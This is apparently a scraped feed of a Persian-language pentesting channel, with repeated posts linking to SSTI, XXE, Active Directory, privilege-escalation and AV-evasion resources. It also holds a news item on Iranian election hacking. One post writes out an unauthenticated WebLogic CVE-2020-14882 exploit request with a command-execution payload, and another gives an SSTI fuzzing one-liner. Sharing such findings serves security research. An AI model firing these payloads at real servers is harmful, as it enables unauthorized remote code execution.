https://twitter.com/MrDamanSingh/status/1317042176337932291?s=20
https://twitter.com/nullenc0de/status/1317195661377503232?s=20
#ssti
#pentest
@sec_nerd
https://twitter.com/nullenc0de/status/1317195661377503232?s=20
#ssti
#pentest
@sec_nerd
Twitter
Damanpreet Singh🇮🇳
Got RCE in 2 minutes via SSTI, ~waybackurls https://t.co/DC4dDq3TjO | qsreplace "daman{{9*9}}" > fuzz.txt ~ffuf -u FUZZ -w fuzz.txt -replay-proxy https://127.0.0.1:8080/ (captured requests in burp) searched: daman81 in burp, got 43 results from 1266 requests…
باگ RCE در اپلیکیشن discord
masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)
#discord
#rce
@sec_nerd
masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)
#discord
#rce
@sec_nerd
mksben.l0.cm
Discord Desktop app RCE
A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...
ورد لیست برای بروت فورس xxe
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf
#xxe
#pentest
@sec_nerd
Gist
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder - xxe-payloads.txt
رتبه بندی زبانهای برنامه نویسی بر اساس میزان برقی که مصرف میکنند!
https://thenewstack.io/which-programming-languages-use-the-least-electricity/
#programming
@sec_nerd
https://thenewstack.io/which-programming-languages-use-the-least-electricity/
#programming
@sec_nerd
When ntuser.pol leads you to SYSTEM
https://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/
#windows
#privesc
@sec_nerd
https://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/
#windows
#privesc
@sec_nerd
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
دستورات و ابزارهای کاربردی در تست نفوذ به اکتیودایرکتوری
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
#AD
#windows
#pentest
@sec_nerd
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
#AD
#windows
#pentest
@sec_nerd
GitHub
GitHub - Integration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods…
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
ابزارهای ویندوزی برای تیم های قرمز
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
به زبان سی شارپ
#pentest
@sec_nerd
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
به زبان سی شارپ
#pentest
@sec_nerd
GitHub
GitHub - Mr-Un1k0d3r/RedTeamCSharpScripts: C# Script used for Red Team
C# Script used for Red Team. Contribute to Mr-Un1k0d3r/RedTeamCSharpScripts development by creating an account on GitHub.
صفر تا صد نفوذ به اکتیودایرکتوری
https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9
#AD
#windows
#network
@sec_nerd
https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9
#AD
#windows
#network
@sec_nerd
Medium
Forest: A walk through in hacking active directory
This box is on the retired list in hack the box. Here is a walk through on how I got full system privileges in this active directory…
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
In-Memory shellcode decoding to evade AVs/EDRs
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
#windows
#pentest
#bypass
@sec_nerd
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
#windows
#pentest
#bypass
@sec_nerd
دپارتمان امنیت ملی امریکا و FBI طی گزارشی به جزییات عملیات هکرهای ایرانی در سرقت آراء و تاثیرگذاری بر انتخابات امریکا پرداختند.
در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.
این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.
همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.
https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/
#news
#iran
#usa
@sec_nerd
در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.
این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.
همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.
https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/
#news
#iran
#usa
@sec_nerd